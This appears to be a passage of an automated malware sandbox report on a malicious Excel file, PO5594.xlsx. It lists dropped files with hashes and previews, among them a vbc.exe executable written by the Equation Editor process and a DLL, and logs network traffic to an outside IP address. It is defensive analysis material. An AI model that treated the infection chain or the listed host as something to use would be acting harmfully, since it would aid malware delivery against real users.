                                                Preview: .PNG........IHDR.............L.!... .IDATx..g.].y&X'...{;.t@F. .. .D*Q.eI..#[.5~lK3...z.3.gw...^.=;.FV..%..d..%R..E......F.ts<..X..f..F..5|..s..:Uu.W.U....!.9...A..u/...g.w......lx...pG..2..x..w..!...w.pG..2..x..w..!.....m.a>.....R........x.IU[.A.....].Y.L..!....|AQ.h4....x..\6....|.i..]..Q..(...C..A..Z... (j.f4..u=..o.D.oj....y6......)I.......G.{zn.M,...?#..,...|....y....G.LOO..?.....7..-.>.._.m[.........q.O}..G....?....h4.=t..c...eY.........3g..|0...x...|..../F....o.._|...?.O..........c..x._..7vF..0.....B>.....}{..V....P(.....c.....4...s...K.K."c(.....}.0......._z...}..y<<.......<..^.7....k.r.W~..c._.....$J....:.w._~.........._..Wp.....q........G..vA.D.E......"...?...'....}nvv....^.^.42..f....Q(..$...`(vidd..8......y.Z{...L.~...k....z....@@0...Bk..?.r..7...9u...w.>w.C..j.n..a..V.?..?...es#.G...l.&I..)..).J..>...+Mn.^.W.._....D...".}..k......8.N_.v..>.y.@0..,/.........>.a...........z.].../.r .........../3.....?.z..g.Z.....l0.L.S....._../.r
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3AC55E10.emf
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                Category:dropped
                                                Size (bytes):498420
                                                Entropy (8bit):0.6413453967611162
                                                Encrypted:false
                                                SSDEEP:384:bKXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:AXwBkNWZ3cjvmWa+VDO
                                                MD5:253092ED7FC7A11EB7E73246CFCFF53D
                                                SHA1:B85995DB5C152CD0E2B9780C2AA0F75FC5A0C93E
                                                SHA-256:D5884EA5800BC2CAEA17513994955FBC6DC7040EBBBB5011EE96A44AC8511DEA
                                                SHA-512:2C838D963E9111A2919E008516D6AE1A03A24680C3C28856169A4DDD96684B7FDB0B43554F9C65063EC6A02D454FAF39E40C164292716798ED1CDDCEC53557FE
                                                Malicious:false
                                                Preview: ....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................\$.......f.\.@F.%...... ............RQQ^...|.........h..$QQ^...|.. ...Id.\|..... ............d.\........................................%...X...%...7...................{$..................C.a.l.i.b.r.i..............X...|......8.\........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ...6...F....F...F..EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\539060AD.png
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                                Category:dropped
                                                Size (bytes):14828
                                                Entropy (8bit):7.9434227607871355
                                                Encrypted:false
                                                SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                                MD5:58DD6AF7C438B638A88D107CC87009C7
                                                SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                                SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                                SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                                Malicious:false
                                                Preview: .PNG........IHDR.............L.!... .IDATx..gp\.y>~v...WTb... ...!.M.H...d.J..3.8.(.L&.lM.d.o..$..q.D.I.....k,J.b3%QD!.Bt,.........p.+.....x?`....{.9o..W.q.Y.gM.g=.5"dm.V..M...iX..6....g=.R(..N'.0&.I(..B2..\...|.t......R.T.......J...Q.U....F.I..B.\...B.Z-....D")..,.J.....u..1.#....A.P.i..!...3.U1....RI..9....:..~..r..N.....Je,...l...(..CCC...v....a.l6KQ...ooo...d.fxx...k``...5.N.\.S.N...e2............b..7..8@.tgg.}..Ue7..e.G .`.J.d2)..B!M..r..T*Q.%..X.......{....,.q.\,.E".........z..*.abbB*...j.\.J.(.b.......|>...........R....L&..X.eYV"..-.R)B.T*M&..pX*.j.Z..9..F.Z.6....b.\./%..~...).B<..T*.z..D"..(...\...d2YKKK...mm.T*..l.T*..I$.x<..J..q..*.J .X..O>...C.d2.JI...:...#....xkk.B.(....D .8..t:..o>...:vC%MNNj.ZHZ....`.T....,...A.....l$.q.\f.....eY..8.+....`dd.b.X,.BH.T..4-..x.EV.|&.p.......O.P(.J.\>66.a.X,...><<....V.R.T*....d2.;v.....W.511.u.a....'..'...zkk.m.t:]__...ggg.o.............Y..z..a.....{..%.H..f...nw*..........'ND"...P(D"... .H..|>/.Hd2....EQ.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7E36B934.png
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                                Category:dropped
                                                Size (bytes):19408
                                                Entropy (8bit):7.931403681362504
                                                Encrypted:false
                                                SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                                MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                                SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                                SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
                                                SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                                Malicious:false
                                                Preview: .PNG........IHDR.............L.!... .IDATx..g.].y&X'...{;.t@F. .. .D*Q.eI..#[.5~lK3...z.3.gw...^.=;.FV..%..d..%R..E......F.ts<..X..f..F..5|..s..:Uu.W.U....!.9...A..u/...g.w......lx...pG..2..x..w..!...w.pG..2..x..w..!.....m.a>.....R........x.IU[.A.....].Y.L..!....|AQ.h4....x..\6....|.i..]..Q..(...C..A..Z... (j.f4..u=..o.D.oj....y6......)I.......G.{zn.M,...?#..,...|....y....G.LOO..?.....7..-.>.._.m[.........q.O}..G....?....h4.=t..c...eY.........3g..|0...x...|..../F....o.._|...?.O..........c..x._..7vF..0.....B>.....}{..V....P(.....c.....4...s...K.K."c(.....}.0......._z...}..y<<.......<..^.7....k.r.W~..c._.....$J....:.w._~.........._..Wp.....q........G..vA.D.E......"...?...'....}nvv....^.^.42..f....Q(..$...`(vidd..8......y.Z{...L.~...k....z....@@0...Bk..?.r..7...9u...w.>w.C..j.n..a..V.?..?...es#.G...l.&I..)..).J..>...+Mn.^.W.._....D...".}..k......8.N_.v..>.y.@0..,/.........>.a...........z.].../.r .........../3.....?.z..g.Z.....l0.L.S....._../.r
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96660C3F.png
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                                Category:dropped
                                                Size (bytes):14828
                                                Entropy (8bit):7.9434227607871355
                                                Encrypted:false
                                                SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                                MD5:58DD6AF7C438B638A88D107CC87009C7
                                                SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                                SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                                SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                                Malicious:false
                                                Preview: .PNG........IHDR.............L.!... .IDATx..gp\.y>~v...WTb... ...!.M.H...d.J..3.8.(.L&.lM.d.o..$..q.D.I.....k,J.b3%QD!.Bt,.........p.+.....x?`....{.9o..W.q.Y.gM.g=.5"dm.V..M...iX..6....g=.R(..N'.0&.I(..B2..\...|.t......R.T.......J...Q.U....F.I..B.\...B.Z-....D")..,.J.....u..1.#....A.P.i..!...3.U1....RI..9....:..~..r..N.....Je,...l...(..CCC...v....a.l6KQ...ooo...d.fxx...k``...5.N.\.S.N...e2............b..7..8@.tgg.}..Ue7..e.G .`.J.d2)..B!M..r..T*Q.%..X.......{....,.q.\,.E".........z..*.abbB*...j.\.J.(.b.......|>...........R....L&..X.eYV"..-.R)B.T*M&..pX*.j.Z..9..F.Z.6....b.\./%..~...).B<..T*.z..D"..(...\...d2YKKK...mm.T*..l.T*..I$.x<..J..q..*.J .X..O>...C.d2.JI...:...#....xkk.B.(....D .8..t:..o>...:vC%MNNj.ZHZ....`.T....,...A.....l$.q.\f.....eY..8.+....`dd.b.X,.BH.T..4-..x.EV.|&.p.......O.P(.J.\>66.a.X,...><<....V.R.T*....d2.;v.....W.511.u.a....'..'...zkk.m.t:]__...ggg.o.............Y..z..a.....{..%.H..f...nw*..........'ND"...P(D"... .H..|>/.Hd2....EQ.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AFCBBB6.png
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):68702
                                                Entropy (8bit):7.960564589117156
                                                Encrypted:false
                                                SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                                MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                                SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                                SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                                SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                                Malicious:false
                                                Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BDFF6443.png
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                Category:dropped
                                                Size (bytes):11303
                                                Entropy (8bit):7.909402464702408
                                                Encrypted:false
                                                SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                Malicious:false
                                                Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C46E2207.png
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):10202
                                                Entropy (8bit):7.870143202588524
                                                Encrypted:false
                                                SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                Malicious:false
                                                Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                                C:\Users\user\AppData\Local\Temp\nskF049.tmp\xggenq.dll
                                                Process:C:\Users\Public\vbc.exe
                                                File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):103424
                                                Entropy (8bit):6.478883962622834
                                                Encrypted:false
                                                SSDEEP:1536:KyadpihizxoDXPNiYLe3ZLpdzYy19k3ncMlN7kOES9OO2nsWjcdIbUFaZVak:KyKiOLVnINSyOBIIbeaZVak
                                                MD5:E811908E17195BEA88661A6C3CB92B91
                                                SHA1:890857EF9EE4D3785086F3B86AB83AC8B913AEE9
                                                SHA-256:A9DF42DC541C9BAB258C914C002426C359B253D7425C5E6038E7384A1CF572FB
                                                SHA-512:5F5FA14FD98D699A37BF9F55E3D25F567F58179611C1DC1E56BEDE39F873CE731B33BCDC7C6D70C13D66DFB2130CF94D2412B9A295D4D79A138684FD1091D0D3
                                                Malicious:false
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~.J.~.J.~.J...J.~.J.,.J.~.J.,#J.~.J.,.J.~.J...K.~.J...K.~.J.~.J.~.J...K.~.J...K.~.J...J.~.J...K.~.JRich.~.J........PE..L...I..a...........!......................................................................@..........................U..L...\U.......................................O...............................O..@............................................text............................... ..`.rdata...N.......P..................@..@.data....O...`...4...P..............@....rsrc...............................@..B.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Temp\w8ymj9mvxgy277qah473
                                                Process:C:\Users\Public\vbc.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):219333
                                                Entropy (8bit):7.993174761144856
                                                Encrypted:true
                                                SSDEEP:6144:WzcaN9fxkj0h27+aaZMK4sjGNATBmebit:Wzcu6O26f4sGjaq
                                                MD5:9F1DA5BF76CEE0067C0B852BC020ACC2
                                                SHA1:279BC1BAE6875A60E06039FFB146138DEAD7C6CF
                                                SHA-256:19057A959E5166348C03A91D7D147D124775A8A438E6B6E47288C5EF635BE16A
                                                SHA-512:362D19A989B5713BE9A5D953B5071A723C06B9AE6583276FDB91FA46C55A970084403B853389F1F8FBCB6DDDBA91908B2DBFD456BD79D8D6E18681A0D8E0386D
                                                Malicious:false
                                                Preview: .U+.Y...f......uj.....iO.!.........*.....yT.....f.....2S|.....2...]..8.Gm.>...4.b.e.}........=.n. M.....7~9.-/..lt...pIa...'^.....1$........)s.b.......X..uR.."yGU..9......e..{....2....-..9.....d?...G\.3q....]........c}..K.....Mm...Q.=..?....<R.4...f.O.9...t...c...I..........*.....yT.....f.....2S|.....g&S.,gV>.....s.G...r.2m.iv(..:.Y......:C.....B.u.._....pIa.ct..P.*.....R(..rf,...I....k.;.)..~C..1.X...2Xva.&.&e..M.......A.....9.....d..."\....]........c}......^...m..~.Q.=..?....<f.4...fw..9%..t.....qZI.>........*.....yT.....f.....2S|.....g&S.,gV>.....s.G...r.2m.iv(..:.Y......:C.....B.u.._....pIa.ct..P.*.....R(..rf,...I....k.;.)..~C..1.X...2Xv.....e..wf.....PU...9.....d..."\......]........c}......^...m..~.Q.=..?....<f.4...fw..9%..t.....qZI.>........*.....yT.....f.....2S|.....g&S.,gV>.....s.G...r.2m.iv(..:.Y......:C.....B.u.._....pIa.ct..P.*.....R(..rf,...I....k.;.)..~C..1.X...2Xv.....e..wf.....PU...9.....d..."\......]........c}
                                                C:\Users\user\AppData\Local\Temp\~DF50F0E8E5645B9254.TMP
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):512
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                Malicious:false
                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Temp\~DF5D47A23D2FA502C9.TMP
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):512
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                Malicious:false
                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Temp\~DFF46076212F85A030.TMP
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):512
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                Malicious:false
                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Temp\~DFFBA49336F871D2DD.TMP
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:CDFV2 Encrypted
                                                Category:dropped
                                                Size (bytes):190424
                                                Entropy (8bit):7.96227380481848
                                                Encrypted:false
                                                SSDEEP:3072:fetf+Tozc7CM5/lSqtarCMAch5AQZBgZdq3n4AZeyxfIAkLTmjeZYHPIMedWZ6Pa:feqMc+M5d6rASAQfgYZeyxqLTmjeddWt
                                                MD5:AE8569EDDE3FE5D5E50F9669BBBA54B0
                                                SHA1:FA19E75584925894B781BCDB1DC53C6B024F7B08
                                                SHA-256:ECEEB9918530B8AB023A2465BACC9C2E572C7AAA7ADD05DF882E49C28FBE6E5B
                                                SHA-512:A5A37A10D622A7897A38F8FB9DC17EC91E94E08D650A3E988A45EBFF3B047FBD86AEB156461AF70874E8E2CCFBDE879505314AF342BB340CE7B07926A3D1B285
                                                Malicious:false
                                                Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                C:\Users\user\Desktop\~$PO5594.xlsx
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):165
                                                Entropy (8bit):1.4377382811115937
                                                Encrypted:false
                                                SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                MD5:797869BB881CFBCDAC2064F92B26E46F
                                                SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                Malicious:true
                                                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                C:\Users\Public\vbc.exe
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Category:dropped
                                                Size (bytes):292696
                                                Entropy (8bit):7.940580532253791
                                                Encrypted:false
                                                SSDEEP:6144:wBlL/cZwF4JmEVpM2MJhVRcGO+LTYKJhUVTj9qsYKGV77ECn:CeZUSpMHwf4YRqsWvn
                                                MD5:11CBFA99FB5EBE8C09674E79B9834D96
                                                SHA1:6E94C5EF59E7A989D93C799217FBF1803B3BB4A4
                                                SHA-256:B7F38916FF521E44E651031EE54E631805F13963BAAF6FF6E3CC1AA72F1D0A43
                                                SHA-512:8429269ED2A747CF11DB3972AFA4A7A0CD59B4EA61D6D189EB17B660A66DD2A7FDEB6CD4F4439044665069060477F856D588634B0CF01F5F67CD6A039FE00CD9
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................................................................t.......................................................................................p..|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc................x..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                                Static File Info

                                                General

                                                File type:CDFV2 Encrypted
                                                Entropy (8bit):7.96227380481848
                                                TrID:
                                                • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                File name:PO5594.xlsx
                                                File size:190424
                                                MD5:ae8569edde3fe5d5e50f9669bbba54b0
                                                SHA1:fa19e75584925894b781bcdb1dc53c6b024f7b08
                                                SHA256:eceeb9918530b8ab023a2465bacc9c2e572c7aaa7add05df882e49c28fbe6e5b
                                                SHA512:a5a37a10d622a7897a38f8fb9dc17ec91e94e08d650a3e988a45ebff3b047fbd86aeb156461af70874e8e2ccfbde879505314af342bb340ce7b07926a3d1b285
                                                SSDEEP:3072:fetf+Tozc7CM5/lSqtarCMAch5AQZBgZdq3n4AZeyxfIAkLTmjeZYHPIMedWZ6Pa:feqMc+M5d6rASAQfgYZeyxqLTmjeddWt
                                                File Content Preview:........................>......................................................................................................................................................................................................................................

                                                File Icon

                                                Icon Hash:e4e2aa8aa4b4bcb4

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 2, 2021 09:26:55.669755936 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:26:55.925766945 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:26:55.925940990 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:26:55.926331043 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:26:56.184113979 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:26:56.184144974 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:26:56.184161901 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:26:56.184178114 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:26:56.184197903 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:26:56.184236050 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:26:56.184242010 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:26:56.441936016 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:26:56.441970110 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:26:56.441982031 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:26:56.441999912 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:26:56.442017078 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:26:56.442033052 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:26:56.442049026 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:26:56.442065001 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:26:56.442214012 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:26:56.442279100 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:26:56.698358059 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:26:56.698430061 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:26:56.698467970 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:26:56.698507071 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:26:56.698542118 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:26:56.698545933 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:26:56.698576927 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:26:56.698580980 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:26:56.698585987 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:26:56.698607922 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:26:56.698627949 CET8049165103.232.53.25192.168.2.22
                                                Nov 2, 2021 09:26:56.698633909 CET4916580192.168.2.22103.232.53.25
                                                Nov 2, 2021 09:26:56.698668957 CET4916580192.168.2.22103.232.53.25
